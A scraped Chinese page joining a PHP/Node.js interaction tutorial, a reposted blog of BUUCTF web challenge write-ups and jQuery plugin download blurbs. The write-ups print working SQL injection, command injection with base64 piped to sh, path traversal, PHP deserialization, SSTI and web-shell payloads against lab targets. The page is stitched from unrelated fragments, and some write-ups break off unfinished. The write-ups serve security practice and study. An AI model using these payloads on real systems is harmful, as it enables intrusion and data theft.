... 随着互联网的发展和技术的进步，越来越多的企业和个人开始关注Web开发。PHP和Node.js是两种非常流行的Web开发语言，它们各有优缺点，也有着不同的应用场景。在这篇文章里，咱们要来好好唠唠PHP和Node.js这两者之间的亲密互动，并且我还会手把手地给大家展示几个超实用的代码实例，让大家伙儿看得明白、学得轻松。 二、PHP与Node.js的异同 1. PHP是一种解释型语言，它可以在服务器端运行，并且可以生成HTML页面。而Node.js是一种JavaScript引擎，它可以用于服务器端编程，也可以用于客户端编程。因此，PHP和Node.js的主要区别在于它们的语言类型和运行环境。 2. PHP主要应用于Web开发，它可以轻松处理数据库操作、表单提交、用户认证等任务。而Node.js这家伙，最厉害的地方就是它超级注重实时响应速度和并行处理任务的能力。拿它来开发那些需要高性能的程序，比如实时聊天室、在线游戏啥的，简直是小菜一碟！ 三、如何让PHP与Node.js进行交互？ 1. 使用HTTP协议 PHP和Node.js都可以通过HTTP协议进行通信。例如，我们可以使用PHP发送一个GET请求到Node.js的服务端，然后Node.js返回响应数据给PHP。以下是一个简单的示例代码： php $url = 'http://localhost:3000/api/data'; $data = file_get_contents($url); echo $data; ?> javascript const http = require('http'); const server = http.createServer((req, res) => { res.statusCode = 200; res.setHeader('Content-Type', 'application/json'); res.end(JSON.stringify({ data: 'Hello from Node.js!' })); }); server.listen(3000); 在这个示例中，PHP使用file_get_contents函数从Node.js获取数据，然后输出到网页上。Node.js则是利用了http这个模块，捣鼓出了一个HTTP服务器。每当它收到一个GET请求时，就会超级贴心地回传一个JSON格式的数据对象作为回应。 2. 使用WebSocket协议 除了HTTP协议，我们还可以使用WebSocket协议来进行PHP和Node.js的交互。WebSocket，你知道吧，就像是一种神奇的双向聊天管道。它能让浏览器或者客户端和服务器两者之间，始终保持实时、流畅的对话，而且啊，还用不着像以前那样，老是反复地发送HTTP请求，多高效便捷！以下是一个简单的示例代码： php $host = 'localhost'; $port = 3000; $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); socket_connect($socket, $host, $port); socket_write($socket, "GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n"); $response = socket_read($socket, 1024); echo $response; socket_close($socket); ?> javascript const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 3000 }); wss.on('connection', ws => { ws.send('Hello from Node.js!'); ws.on('message', message => { console.log(Received message => ${message}); }); }); 在这个示例中，PHP使用socket_create和socket_connect函数创建了一个TCP连接，并向Node.js发送了一个HTTP GET请求。Node.js借助WebSocket模块，捣鼓出一个WebSocket服务器。每当有客户端小手一挥发起连接请求时，服务器就会立马给客户端回个消息。同时，它还耳聪目明地监听着客户端发来的每一条消息事件。 四、总结 总的来说，PHP和Node.js都是优秀的Web开发工具，它们有着各自的优点和适用场景。PHP这门语言，就像是企业级应用开发的传统老将，尤其在那些需要稳定、持久运行的场景里，它发挥得游刃有余。而Node.js呢，更像是实时交互和高并发处理领域的灵活小能手，对于那些要求快速响应、大量并发请求的应用开发，Node.js的表现绝对会让你眼前一亮，就像个活力十足的小伙子，轻松应对各种挑战。无论你挑哪个工具，咱都得把它独有的特点和优势摸得门儿清，然后把这些优势发挥到极致，这样才能让开发效率蹭蹭往上涨，同时保证咱们的应用程序质量杠杠滴。此外，咱们也得摸清楚PHP和Node.js是怎么联手合作的，这样一来，咱就能更巧妙地把这两门技术的优点用到极致，给咱们的开发工作添砖加瓦，创造出更多意想不到的可能性。

本篇文章为转载内容。原文链接：https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。 目录 [HCTF 2018]WarmUp [强网杯 2019]随便注 [SUCTF 2019]EasySQL [GYCTF2020]Blacklist [GKCTF2020]cve版签到 GXYCTF2019禁止套娃 [De1CTF 2019]SSRF Me [极客大挑战 2019]EasySQL [极客大挑战 2019]Havefun [极客大挑战 2019]Secret File [ACTF2020 新生赛]Include 2018]easy_tornado [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [RoarCTF 2019]Easy Calc [极客大挑战 2019]Knife [ACTF2020 新生赛]Exec [极客大挑战 2019]PHP [极客大挑战 2019]Http [HCTF 2018]admin [极客大挑战 2019]BabySQL [HCTF 2018]WarmUp 这里补充一个知识点：phpmyadmin 4.8.1任意文件包含 环境我已经启动了 去访问一下 源码有提示 去访问一下 然后看到了源码 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 这里白名单里给了一个提示 尝试直接去访问它 报错了… 尝试穿越目录去访问 依然报错了 看源码吧 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//这里是提供了两个白名单if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr( //返回中文字符串的一部分$page,0,mb_strpos($page . '?', '?') //我们输入flag 但其实它在你的字符串后面加了一个问号，然后返回问号的位置，就是=4//所以想绕过这里，直接?flag，他检测到的问号就是0，然后0，0没有执行 就绕过了);if (in_array($_page, $whitelist)) { //检测是不是在白名单/hint.php?flag 进行绕过 进行目录穿越就可以了return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }//上面是定义了一个类if (! empty($_REQUEST['file']) //如果变量不存在的话，empty()并不会产生警告。 && is_string($_REQUEST['file']) //必须是字符串&& emmm::checkFile($_REQUEST['file']) //上面的那个类) {include $_REQUEST['file']; //就包含这个文件 参数也就是fileexit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 所以 最后就是 这样 ?file=hint.php?../../../../../../../../ffffllllaaaagggg 就得到了flag flag{acbbba26-c81b-4603-bcb7-25f78adeab18} [强网杯 2019]随便注 进入题目链接 1.输入：1' 查看注入类型 所以他的sql语句是单引号过滤 2.查看字段 （为2） 1' order by 2 3.显示回显 1' union select 1,2 相当于告诉了我们它的过滤 尝试用堆叠查询试试了 4.查库 1;show database(); 5.查表 1';show tables; 所以是有两个表 1919810931114514 words 6.查列 1';show columns from words; 表名words需要被 这个符号包起来，这个符号是 esc下面一个的按键，这个符号在mysql里 用于 分割其他命令，表示此为（表名、字段名） 1';show columns from 1919810931114514; 看到flag了!!! 那么如何查询到数据呢？ select 函数被过滤了，其实mysql的函数有很多 这里通过 MYSQL的预处理语句，使用 : concat（'s','elect',' from 1919810931114514'） 完成绕过 构造pyload： 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字，字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说，没有回显，联合查询基本没戏。 好在页面会进行相应的变化，证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回，一种是空白，一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母（除过滤的关键词外）都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符，不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接，但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式：pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接，而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候，mysql也可以把 || 作为字符串拼接。 修改完后，|| 就会被认为是字符串拼接符 MySQL中sql_mode参数，具体的看这里 解题思路1： payload：,1 查询语句：select ,1||flag from Flag 解题思路2： 堆叠注入，使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析： 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式：pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入：1’ 为'闭合 2.看字段：1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ，太像了，增加了过滤规则。 修改表名和set均不可用，所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据，也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了：cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x，低于7.3.16的7.3.x和低于7.4.4的7.4.x中，将get_headers（）与用户提供的URL一起使用时，如果URL包含零（\ 0）字符，则URL将被静默地截断。这可能会导致某些软件对get_headers（）的目标做出错误的假设，并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点： cve-2020-7066利用 老套路：先F12查看源码 发现提示：Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾，这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点： .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素，并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节，看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢？<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦！");} }else{die("再好好想想！");} }else{die("还想读flag，臭弟弟！");} }// highlight_file(__FILE__);?> 既然getshell基本不可能，那么考虑读源码 看源码，flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件，例如： <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数： localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点： current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步：读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下，利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数，此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由，就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的，参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的，名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象，hexdigest()是获得加密后的16进制字符串 urllib.unquote(） 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog，且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了：secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为：fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入： /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目： 1.tornado是一个python的模板，可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息，想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞，尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入： 查字段：1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表： [GXYCTF2019]Ping Ping Ping 考察：RCE的防护绕过 直接构造：?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格，使用拼接变量来拼接出Flag字符串： 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么：?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥，flag字眼也过滤了，bash也没了，不过sh没过滤： 继续构造payload： ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码，得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass，具体看这里 HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 1.删除空白符2.将某些字符转换为下划线（包括空格） scandir()：列出参数目录中的文件和目录 发现/被过滤了 ，可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload： 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典，要带路径 -r 递归跑(查到一个目录后，重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道，如果password=100，username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时，属性个数的值大于实际属性个数时，就可以 2.private修饰符的问题 private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover， 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法： flask session 伪造 具体，看这里 flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而flask并没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显： 1' uniunionon selselectect 1,2,3 over！正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接：https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...js框架。该插件专为网页设计师和开发者提供了一种新颖的方式来吸引访客的注意力，特别是在展示产品或内容时。通过这款插件，当用户将鼠标悬停在特定的卡片上时，一只可爱的卡通小狗就会神奇地从卡片下方探出头来，伴随着流畅而生动的动画效果。这种设计不仅能够瞬间抓住浏览者的目光，还能增加页面的趣味性和互动性，让用户在浏览过程中获得更多的乐趣和参与感。其背后的实现原理是利用Vue.js的数据绑定和组件化特性，使得动画效果可以与用户的操作紧密关联。每当用户鼠标进入或离开卡片区域时，Vue.js能够立即响应并触发相应的动画逻辑，从而实现平滑过渡的视觉效果。此外，由于Vue.js的高效渲染机制，即使是在复杂动画场景下，也能保证良好的性能表现，不会对网站加载速度造成负面影响。总之，这款基于Vue.js的鼠标悬停动物显示和隐藏动画特效插件，不仅为网站增添了活力与个性，同时也展示了现代前端技术的强大功能和无限可能。无论是用于个人项目还是商业网站，都能有效提升用户体验，让您的网站更加独特和吸引人。 点我下载 文件大小：24.55 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...y和jQueryUI技术栈，动态生成SVG基于的旋转按钮，不仅增强了用户体验，还提高了页面的加载速度与性能。插件特点：1.SVG技术：使用SVG（可缩放矢量图形）作为绘制基础，使得按钮在不同设备和屏幕尺寸下都能保持清晰、高质量的视觉效果，同时减少了文件大小，有利于网页优化。2.高度定制性：通过配置选项，用户可以自定义按钮的颜色、尺寸、动画效果等，满足各种设计需求。这种灵活性使得jQuery.knob.js能够轻松融入不同的项目风格中。3.交互丰富：支持多种交互事件，如点击、滑动、拖拽等，使按钮具备动态响应能力，增强了用户的参与感和互动体验。4.易于集成：作为jQuery插件，jQuery.knob.js可以无缝地与现有的jQuery应用结合，简化了集成过程，减少了开发时间。5.高性能：基于SVG的动态渲染方式相较于传统的图像提供了更好的性能表现，尤其是在高分辨率屏幕上，能显著提升用户体验。6.兼容性：jQuery.knob.js支持广泛的浏览器环境，确保了跨平台的兼容性和广泛的应用范围。应用场景：-数字仪表盘：适用于显示进度、百分比或数值等数据的动态更新。-音乐控制界面：作为音量调节、播放进度条等的交互元素。-信息展示界面：例如天气预报中的温度变化指示器等。-用户界面设计：用于创建具有现代感和高交互性的用户界面组件。总之，jQuery.knob.js以其强大的功能、高度的定制性和优秀的性能，成为构建丰富交互式SVG旋转按钮的理想选择，适合各类需要增强用户交互体验的项目。 点我下载 文件大小：46.26 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...近期，随着Web开发技术的发展，特别是浏览器原生API能力的增强，开发者们在处理DOM事件时拥有了更多选择。例如，除了jQuery外，现代前端框架如React、Vue等提倡使用合成事件系统，它提供了跨浏览器兼容性以及对虚拟DOM的高效支持。 此外，对于动态生成的DOM元素，推荐采用事件委托的方式绑定事件，而非直接为每个元素单独绑定。JavaScript的addEventListener方法能够更好地支持这一需求，只需将事件处理器添加到父元素上，利用事件冒泡机制捕获子元素触发的事件。例如，在处理大型列表渲染场景时，事件委托可以显著提高性能和内存利用率。 另外，值得注意的是，由于异步加载内容或SPA（单页应用）的流行，确保所有代码按预期顺序执行显得尤为重要。一种策略是利用生命周期钩子函数（如React的componentDidMount），以确保在组件渲染完成后再进行事件绑定。 在实际项目中，还需要关注无障碍访问性问题，比如确保按钮元素具有明确的role属性，并正确设置tabindex以便键盘操作，从而提升网站对残障用户的友好度。 综上所述，无论是jQuery还是其他现代前端技术栈，在处理按钮点击事件这类常见的交互逻辑时，开发者都应关注代码质量、性能优化及用户体验等多个维度，结合最新的开发理念和技术趋势，持续改进和完善代码实现。

...avaScript在网页中的DOM操作、事件处理、Ajax交互等功能。通过提供简洁的API和丰富的插件生态系统，jQuery帮助开发者更高效地实现动态效果、交互功能以及数据交互，是Web开发领域的重要工具之一。 DOM元素 , DOM（Document Object Model）元素是指HTML或XML文档中任意一个可被JavaScript识别并进行操作的对象。在网页编程中，每一个标签（如div、input、radio等）都可以视为一个DOM元素，它们可以通过JavaScript进行查询、修改、添加或删除等操作，从而实现网页内容和结构的动态更新。 事件处理 , 事件处理是浏览器环境中的一种编程机制，允许程序员定义当用户执行特定操作（如点击按钮、滚动页面、输入文本等）时应触发的代码逻辑。在jQuery中，事件处理更加便捷，只需一行代码即可为元素绑定各种类型的事件，并在其触发时执行相应的函数或方法，例如文中提到的为所有radio按钮绑定单击事件以执行特定功能。